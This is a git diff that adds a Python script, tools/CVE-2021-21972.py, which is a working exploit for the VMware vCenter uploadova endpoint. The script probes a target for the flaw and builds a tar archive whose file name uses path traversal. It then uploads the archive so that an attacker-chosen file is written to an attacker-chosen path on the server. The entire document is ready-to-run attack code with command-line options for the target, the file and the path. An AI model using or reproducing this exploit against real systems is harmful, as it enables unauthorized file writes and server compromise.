diff --git a/tools/CVE-2021-21972.py b/tools/CVE-2021-21972.py
new file mode 100644
index 000000000..2541d7a8a
--- /dev/null
+++ b/tools/CVE-2021-21972.py
@@ -0,0 +1,61 @@
+#!/usr/bin/python3
+
+import argparse
+import requests
+import tarfile
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+ENDPOINT = '/ui/vropspluginui/rest/services/uploadova'
+
+def check(ip):
+    r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=30)
+    if r.status_code == 405:
+        print('[+] ' + ip + ' vulnerable to CVE-2021-21972!')
+        return True
+    else:
+        print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.')
+        return False
+
+def make_traversal_path(path, level=5, os="unix"):
+    if os == "win":
+        traversal = ".." + "\\"
+        fullpath = traversal*level + path
+        return fullpath.replace('/', '\\').replace('\\\\', '\\') 
+    else:
+        traversal = ".." + "/"
+        fullpath = traversal*level + path
+        return fullpath.replace('\\', '/').replace('//', '/')
+
+def archive(file, path, os):
+    tarf = tarfile.open('exploit.tar', 'w')
+    fullpath = make_traversal_path(path, level=5, os=os)
+    print('[+] Adding ' + file + ' as ' + fullpath + ' to archive')
+    tarf.add(file, fullpath)
+    tarf.close()
+    print('[+] Wrote ' + file + ' to exploit.tar on local filesystem')
+
+def post(ip):
+    r = requests.post('https://' + ip + ENDPOINT, files={'uploadFile':open('exploit.tar', 'rb')}, verify=False, timeout=30)
+    if r.status_code == 200 and r.text == 'SUCCESS':
+        print('[+] File uploaded successfully')
+    else:
+        print('[-] File failed to upload the archive. The service may not have permissions for the specified path')
+        print('[-] Status Code: ' + str(r.status_code) + ', Response:\n' + r.text) 
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
+    parser.add_argument('-f', '--file', help='The file to tar')
+    parser.add_argument('-p', '--path', help='The path to extract the file to on target')
+    parser.add_argument('-o', '--operating-system', help='The operating system of the VCSA server')
+    args = parser.parse_args()
+    
+    vulnerable = check(args.target)
+    if vulnerable and (args.file and args.path and args.operating_system):
+        archive(args.file, args.path, args.operating_system)
+        post(args.target)
+    
+
+
+